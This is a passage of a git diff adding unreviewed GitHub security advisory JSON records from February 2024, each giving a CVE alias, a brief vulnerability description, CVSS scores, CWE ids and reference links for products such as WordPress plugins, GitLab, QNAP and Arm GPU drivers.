"2024-02-02T16:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-7w7c-rqj8-5pmg/GHSA-7w7c-rqj8-5pmg.json b/advisories/unreviewed/2024/02/GHSA-7w7c-rqj8-5pmg/GHSA-7w7c-rqj8-5pmg.json new file mode 100644 index 0000000000000..4046e7f5045c5 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-7w7c-rqj8-5pmg/GHSA-7w7c-rqj8-5pmg.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7w7c-rqj8-5pmg", + "modified": "2024-02-08T15:30:27Z", + "published": "2024-02-08T15:30:27Z", + "aliases": [ + "CVE-2024-1149" + ], + "details": "Improper Verification of Cryptographic Signature vulnerability in Snow Software Inventory Agent on MacOS, Snow Software Inventory Agent on Windows, Snow Software Inventory Agent on Linux allows File Manipulation through Snow Update Packages.This issue affects Inventory Agent: through 6.12.0; Inventory Agent: through 6.14.5; Inventory Agent: through 6.7.2.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1149" + }, + { + "type": "WEB", + "url": "https://community.snowsoftware.com/s/feed/0D5Td000004YtMcKAK" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-347" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T13:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-7w82-p9xp-fp58/GHSA-7w82-p9xp-fp58.json b/advisories/unreviewed/2024/02/GHSA-7w82-p9xp-fp58/GHSA-7w82-p9xp-fp58.json new file mode 100644 index 0000000000000..66a658afd4da0 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-7w82-p9xp-fp58/GHSA-7w82-p9xp-fp58.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7w82-p9xp-fp58", + "modified": "2024-02-07T00:30:25Z", + "published": "2024-02-07T00:30:25Z", + "aliases": [ + "CVE-2024-1261" + ], + "details": "A vulnerability classified as critical was found in Juanpao JPShop up to 1.5.02. This vulnerability affects the function actionIndex of the file /api/controllers/merchant/app/ComboController.php of the component API. The manipulation of the argument pic_url leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-253000.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1261" + }, + { + "type": "WEB", + "url": "https://note.zhaoj.in/share/v2JpHJngvw7E" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.253000" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.253000" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T22:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-7x8g-jfhh-pqhm/GHSA-7x8g-jfhh-pqhm.json b/advisories/unreviewed/2024/02/GHSA-7x8g-jfhh-pqhm/GHSA-7x8g-jfhh-pqhm.json new file mode 100644 index 0000000000000..1e476c8d3b86e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-7x8g-jfhh-pqhm/GHSA-7x8g-jfhh-pqhm.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7x8g-jfhh-pqhm", + "modified": "2024-02-01T15:30:24Z", + "published": "2024-02-01T15:30:24Z", + "aliases": [ + "CVE-2024-0704" + ], + "details": "Rejected reason: very low impact - impractical to correct", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0704" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T15:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-7xgh-8hg2-6j33/GHSA-7xgh-8hg2-6j33.json b/advisories/unreviewed/2024/02/GHSA-7xgh-8hg2-6j33/GHSA-7xgh-8hg2-6j33.json new file mode 100644 index 0000000000000..467839e24f4e4 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-7xgh-8hg2-6j33/GHSA-7xgh-8hg2-6j33.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7xgh-8hg2-6j33", + "modified": "2024-02-07T00:30:25Z", + "published": "2024-02-07T00:30:25Z", + "aliases": [ + "CVE-2023-40143" + ], + "details": "\nAn attacker with access to the Westermo Lynx web application that has the vulnerable software could introduce arbitrary JavaScript by injecting a cross-site scripting payload into the \"forward.0.domain\" parameter.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-40143" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-023-04" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T22:16:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-7xmr-w6vf-6jjf/GHSA-7xmr-w6vf-6jjf.json b/advisories/unreviewed/2024/02/GHSA-7xmr-w6vf-6jjf/GHSA-7xmr-w6vf-6jjf.json new file mode 100644 index 0000000000000..c35fa8ea40196 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-7xmr-w6vf-6jjf/GHSA-7xmr-w6vf-6jjf.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7xmr-w6vf-6jjf", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0678" + ], + "details": "The Order Delivery Date for WP e-Commerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'available-days-tf' parameter in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0678" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/order-delivery-date/trunk/order_delivery_date.php#L221" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/71fb90b6-a484-4a70-a9dc-795cbf2e275e?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-82fm-6qgx-7w8m/GHSA-82fm-6qgx-7w8m.json b/advisories/unreviewed/2024/02/GHSA-82fm-6qgx-7w8m/GHSA-82fm-6qgx-7w8m.json new file mode 100644 index 0000000000000..bf793223ff4d6 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-82fm-6qgx-7w8m/GHSA-82fm-6qgx-7w8m.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-82fm-6qgx-7w8m", + "modified": "2024-02-07T09:30:31Z", + "published": "2024-02-07T09:30:31Z", + "aliases": [ + "CVE-2023-46914" + ], + "details": "SQL Injection vulnerability in RM bookingcalendar module for PrestaShop versions 2.7.9 and before, allows remote attackers to execute arbitrary code, escalate privileges, and obtain sensitive information via ics_export.php.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46914" + }, + { + "type": "WEB", + "url": "https://security.friendsofpresta.org/modules/2024/02/06/bookingcalendar.html" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T09:15:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-82mh-pj8x-3fw7/GHSA-82mh-pj8x-3fw7.json b/advisories/unreviewed/2024/02/GHSA-82mh-pj8x-3fw7/GHSA-82mh-pj8x-3fw7.json new file mode 100644 index 0000000000000..85dd5fb9e4ee2 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-82mh-pj8x-3fw7/GHSA-82mh-pj8x-3fw7.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-82mh-pj8x-3fw7", + "modified": "2024-02-07T09:30:31Z", + "published": "2024-02-07T09:30:31Z", + "aliases": [ + "CVE-2024-0628" + ], + "details": "The WP RSS Aggregator plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 4.23.5 via the RSS feed source in admin settings. This makes it possible for authenticated attackers, with administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0628" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3029525/wp-rss-aggregator" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2154383e-eabb-4964-8991-423dd68d5efb?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T07:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-82rx-j336-57m8/GHSA-82rx-j336-57m8.json b/advisories/unreviewed/2024/02/GHSA-82rx-j336-57m8/GHSA-82rx-j336-57m8.json new file mode 100644 index 0000000000000..4f6854a749844 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-82rx-j336-57m8/GHSA-82rx-j336-57m8.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-82rx-j336-57m8", + "modified": "2024-02-02T09:30:23Z", + "published": "2024-02-02T09:30:23Z", + "aliases": [ + "CVE-2024-22851" + ], + "details": "Directory Traversal Vulnerability in LiveConfig before v.2.5.2 allows a remote attacker to obtain sensitive information via a crafted request to the /static/ endpoint.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22851" + }, + { + "type": "WEB", + "url": "https://www.drive-byte.de/en/blog/liveconfig-advisory-cve-2024-22851" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T09:15:37Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-839x-p2jc-q87x/GHSA-839x-p2jc-q87x.json b/advisories/unreviewed/2024/02/GHSA-839x-p2jc-q87x/GHSA-839x-p2jc-q87x.json new file mode 100644 index 0000000000000..b8392529f6464 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-839x-p2jc-q87x/GHSA-839x-p2jc-q87x.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-839x-p2jc-q87x", + "modified": "2024-02-05T12:30:20Z", + "published": "2024-02-05T12:30:20Z", + "aliases": [ + "CVE-2023-5249" + ], + "details": "Use After Free vulnerability in Arm Ltd Bifrost GPU Kernel Driver, Arm Ltd Valhall GPU Kernel Driver allows a local non-privileged user to make improper memory processing operations to exploit a software race condition. If the system’s memory is carefully prepared by the user, then this in turn cause a use-after-free.This issue affects Bifrost GPU Kernel Driver: from r35p0 through r40p0; Valhall GPU Kernel Driver: from r35p0 through r40p0.\n\n", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5249" + }, + { + "type": "WEB", + "url": "https://developer.arm.com/Arm%20Security%20Center/Mali%20GPU%20Driver%20Vulnerabilities" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-416" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T10:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-83rr-gwhc-x8g8/GHSA-83rr-gwhc-x8g8.json b/advisories/unreviewed/2024/02/GHSA-83rr-gwhc-x8g8/GHSA-83rr-gwhc-x8g8.json new file mode 100644 index 0000000000000..a92bff546288d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-83rr-gwhc-x8g8/GHSA-83rr-gwhc-x8g8.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-83rr-gwhc-x8g8", + "modified": "2024-02-06T09:31:38Z", + "published": "2024-02-06T09:31:38Z", + "aliases": [ + "CVE-2023-28049" + ], + "details": "\nDell Command | Monitor, versions prior to 10.9, contain an arbitrary folder deletion vulnerability. A locally authenticated malicious user may exploit this vulnerability in order to perform a privileged arbitrary file delete.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-28049" + }, + { + "type": "WEB", + "url": "https://www.dell.com/support/kbdoc/en-us/000211748/dsa-2023-125-dell-command-monitor-dcm" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-267" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T07:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-859v-mr3m-wgxq/GHSA-859v-mr3m-wgxq.json b/advisories/unreviewed/2024/02/GHSA-859v-mr3m-wgxq/GHSA-859v-mr3m-wgxq.json new file mode 100644 index 0000000000000..9dd17b1ec8240 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-859v-mr3m-wgxq/GHSA-859v-mr3m-wgxq.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-859v-mr3m-wgxq", + "modified": "2024-02-06T06:30:31Z", + "published": "2024-02-06T06:30:31Z", + "aliases": [ + "CVE-2023-33072" + ], + "details": "Memory corruption in Core while processing control functions.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33072" + }, + { + "type": "WEB", + "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T06:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-85pp-8vhv-c78m/GHSA-85pp-8vhv-c78m.json b/advisories/unreviewed/2024/02/GHSA-85pp-8vhv-c78m/GHSA-85pp-8vhv-c78m.json new file mode 100644 index 0000000000000..4f24eda6c8de3 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-85pp-8vhv-c78m/GHSA-85pp-8vhv-c78m.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-85pp-8vhv-c78m", + "modified": "2024-02-07T18:30:26Z", + "published": "2024-02-01T12:30:22Z", + "aliases": [ + "CVE-2023-51674" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in AAM Advanced Access Manager – Restricted Content, Users & Roles, Enhanced Security and More allows Stored XSS.This issue affects Advanced Access Manager – Restricted Content, Users & Roles, Enhanced Security and More: from n/a through 6.9.18.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51674" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/advanced-access-manager/wordpress-advanced-access-manager-plugin-6-9-18-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T11:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-89f2-38w4-8x2m/GHSA-89f2-38w4-8x2m.json b/advisories/unreviewed/2024/02/GHSA-89f2-38w4-8x2m/GHSA-89f2-38w4-8x2m.json new file mode 100644 index 0000000000000..07801e559d19c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-89f2-38w4-8x2m/GHSA-89f2-38w4-8x2m.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-89f2-38w4-8x2m", + "modified": "2024-02-07T00:30:25Z", + "published": "2024-02-07T00:30:25Z", + "aliases": [ + "CVE-2023-38579" + ], + "details": "\n\n\n\n\n\n\n\n\n\n\n\n\nThe cross-site request forgery token in the request may be predictable or easily guessable allowing attackers to craft a malicious request, which could be triggered by a victim unknowingly. In a successful CSRF attack, the attacker could lead the victim user to carry out an action unintentionally.\n\n\n\n\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38579" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-023-04" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T22:16:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-89fw-fqph-63fm/GHSA-89fw-fqph-63fm.json b/advisories/unreviewed/2024/02/GHSA-89fw-fqph-63fm/GHSA-89fw-fqph-63fm.json new file mode 100644 index 0000000000000..6ddd9b8d8536e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-89fw-fqph-63fm/GHSA-89fw-fqph-63fm.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-89fw-fqph-63fm", + "modified": "2024-02-02T09:30:21Z", + "published": "2024-02-02T09:30:21Z", + "aliases": [ + "CVE-2024-0285" + ], + "details": "\nin OpenHarmony v4.0.0 and prior versions allow a local attacker cause DOS through improper input.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0285" + }, + { + "type": "WEB", + "url": "https://gitee.com/openharmony/security/blob/master/zh/security-disclosure/2024/2024-02.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T07:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-89x3-jgxj-39cx/GHSA-89x3-jgxj-39cx.json b/advisories/unreviewed/2024/02/GHSA-89x3-jgxj-39cx/GHSA-89x3-jgxj-39cx.json new file mode 100644 index 0000000000000..2a032f5875a08 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-89x3-jgxj-39cx/GHSA-89x3-jgxj-39cx.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-89x3-jgxj-39cx", + "modified": "2024-02-06T21:30:27Z", + "published": "2024-02-06T21:30:27Z", + "aliases": [ + "CVE-2024-22514" + ], + "details": "An issue discovered in iSpyConnect.com Agent DVR 5.1.6.0 allows attackers to run arbitrary files by restoring a crafted backup file.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22514" + }, + { + "type": "WEB", + "url": "https://github.com/Orange-418/CVE-2024-22514-Remote-Code-Execution" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T21:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-89x8-fvq4-x5w3/GHSA-89x8-fvq4-x5w3.json b/advisories/unreviewed/2024/02/GHSA-89x8-fvq4-x5w3/GHSA-89x8-fvq4-x5w3.json new file mode 100644 index 0000000000000..e0ce899d0883e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-89x8-fvq4-x5w3/GHSA-89x8-fvq4-x5w3.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-89x8-fvq4-x5w3", + "modified": "2024-02-08T00:32:19Z", + "published": "2024-02-08T00:32:19Z", + "aliases": [ + "CVE-2024-1066" + ], + "details": "An issue has been discovered in GitLab EE affecting all versions from 13.3.0 prior to 16.6.7, 16.7 prior to 16.7.5, and 16.8 prior to 16.8.2 which allows an attacker to do a resource exhaustion using GraphQL `vulnerabilitiesCountByDay`", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1066" + }, + { + "type": "WEB", + "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/420341" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T22:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-8chw-9j48-7gmj/GHSA-8chw-9j48-7gmj.json b/advisories/unreviewed/2024/02/GHSA-8chw-9j48-7gmj/GHSA-8chw-9j48-7gmj.json new file mode 100644 index 0000000000000..063b1cfbc39b3 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-8chw-9j48-7gmj/GHSA-8chw-9j48-7gmj.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8chw-9j48-7gmj", + "modified": "2024-02-02T18:30:32Z", + "published": "2024-02-02T18:30:32Z", + "aliases": [ + "CVE-2023-50359" + ], + "details": "An unchecked return value vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow local authenticated administrators to place the system in a state that could lead to a crash or other unintended behaviors via unspecified vectors.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.5.2645 build 20240116 and later\nQuTS hero h5.1.5.2647 build 20240118 and later\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50359" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-24-07" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-252" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-8frx-325f-xvxg/GHSA-8frx-325f-xvxg.json b/advisories/unreviewed/2024/02/GHSA-8frx-325f-xvxg/GHSA-8frx-325f-xvxg.json new file mode 100644 index 0000000000000..52f46dfea25bb --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-8frx-325f-xvxg/GHSA-8frx-325f-xvxg.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8frx-325f-xvxg", + "modified": "2024-02-01T18:31:08Z", + "published": "2024-02-01T18:31:08Z", + "aliases": [ + "CVE-2024-1167" + ], + "details": "\nWhen SEW-EURODRIVE MOVITOOLS MotionStudio processes XML information unrestricted file access can occur.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1167" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-016-01" + }, + { + "type": "WEB", + "url": "https://www.seweurodrive.com/contact_us/contact_us.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-611" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T18:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-8gj6-33mj-vg96/GHSA-8gj6-33mj-vg96.json b/advisories/unreviewed/2024/02/GHSA-8gj6-33mj-vg96/GHSA-8gj6-33mj-vg96.json new file mode 100644 index 0000000000000..b7453ba2b038f --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-8gj6-33mj-vg96/GHSA-8gj6-33mj-vg96.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8gj6-33mj-vg96", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0384" + ], + "details": "The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Recipe Notes in all versions up to, and including, 9.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0384" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3019769%40wp-recipe-maker&new=3019769%40wp-recipe-maker&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/749c5d09-1e9a-4aa1-b7c2-6f9d24f3a09b?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-8gwc-m58g-hm5v/GHSA-8gwc-m58g-hm5v.json b/advisories/unreviewed/2024/02/GHSA-8gwc-m58g-hm5v/GHSA-8gwc-m58g-hm5v.json new file mode 100644 index 0000000000000..8ad919d04512f --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-8gwc-m58g-hm5v/GHSA-8gwc-m58g-hm5v.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8gwc-m58g-hm5v", + "modified": "2024-02-05T06:30:31Z", + "published": "2024-02-05T06:30:31Z", + "aliases": [ + "CVE-2024-20003" + ], + "details": "In Modem NL1, there is a possible system crash due to an improper input validation. This could lead to remote denial of service, if NW sent invalid NR RRC Connection Setup message, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01191612; Issue ID: MOLY01191612 (MSV-981).", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20003" + }, + { + "type": "WEB", + "url": "https://corp.mediatek.com/product-security-bulletin/February-2024" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T06:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-8gwq-mv35-rmmj/GHSA-8gwq-mv35-rmmj.json b/advisories/unreviewed/2024/02/GHSA-8gwq-mv35-rmmj/GHSA-8gwq-mv35-rmmj.json new file mode 100644 index 0000000000000..646a7b30fc2d0 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-8gwq-mv35-rmmj/GHSA-8gwq-mv35-rmmj.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8gwq-mv35-rmmj", + "modified": "2024-02-06T00:30:26Z", + "published": "2024-02-06T00:30:26Z", + "aliases": [ + "CVE-2023-6933" + ], + "details": "The Better 